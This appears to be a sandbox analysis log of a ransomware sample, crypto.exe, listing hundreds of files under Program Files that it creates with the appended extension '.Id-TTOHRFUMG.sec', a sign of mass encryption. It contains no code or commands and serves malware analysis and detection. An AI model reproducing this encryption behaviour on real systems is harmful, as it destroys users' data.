File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR25F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\CONTACTS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\skins\skin.dtd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dataset.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\dblook.bat.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Customer Support.fdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\SCNPST64.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\26.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\gadget.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.policy.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jps.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\mailapi.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Biscay.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\whitevignette1047.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\REPORTL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Adak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00270_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01069_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB00780L.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\CNFRES.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\ProjectStatusReport.potx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_it.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\css\flyout.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\javaws.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ja_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01434_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.BR.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtobe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\Passport_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\unpack.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Perth.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\amd64\jvm.cfg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Tijuana.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0278882.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\button.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\babypink.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSOCFUIUTILITIESDLL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01139_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileOffMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square_m.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-tabcontrol.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\images\cursors\cursors.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01777_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0212661.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02368_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Microsoft.Office.Interop.InfoPath.Xml.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Argentina\Salta.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02431_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02464_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_decreaseindent.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0214948.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\maintenanceservice.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\charsets.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00833_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsImageTemplate.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_thunderstorm.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\logo.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\nio.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Helsinki.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178932.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185828.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187839.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB8.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\ApproveProtect.mht.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090149.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00726_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libyuvp_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\13.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\dial.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\README-JDK.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195342.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_hail.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui_2.3.0.v20140404-1657.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\NBMapTIP.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Manaus.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\1033\TRANSMRR.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSTORDB.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\splash.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ACCDDS.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_left.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_09.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099169.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0179963.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_HighMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04323_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN02559_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341645.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\timer_up.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\drag.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper.registry_1.0.300.v20130327-1442.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\control\libnetsync_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked-loading.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\button-highlight.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00442_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0177257.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vevay.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\OWSSUPP.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\classlist.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01080_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105520.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152884.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR44B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\OLAPPT.FAE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\control\libhotkeys_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\bear_formatted_matte2.wmv.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00834_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL002.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\plugin.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0252629.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\44.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\local_policy.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18237_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14595_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\settings.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Defender\MpClient.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-awt.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN010.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSHY7EN.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jayapura.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\LETTHEAD.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Charitable Contributions.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.RSD.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-modules.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_FormsHomePageBlank.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\MedianMergeFax.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\librotate_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\43.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\ContactPickerIntl.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00397_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BORDERS\MSART3.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\Hierarchy.xsl.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Bissau.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\TASKREQS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Helsinki.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105390.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186364.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00494_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02214_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME28.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\control\liboldrc_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\js\clock.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\WINWORD_COL.HXC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSSP7EN.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationUp_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Africa\Abidjan.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Yakutsk.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107308.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107722.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00603_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0292152.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSACCESS.DEV.HXS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_hover.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\drag.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\management.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application-views.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287643.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21342_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\QuestionIconMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Part\Media.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\OmdBase.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\VIEW.JS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libtheora_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Jujuy.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata_2.2.0.v20131211-1531.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-common.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.ES.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\liblpcm_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libmft_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00040_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02071_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Bibliography\Sort\TITLE.XSL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\AcroRead.msi.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_es.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Places\WARN.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LINE.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Africa\Accra.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101859.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105974.WMF.Id-TTOHRFUMG.sec	crypto.exe
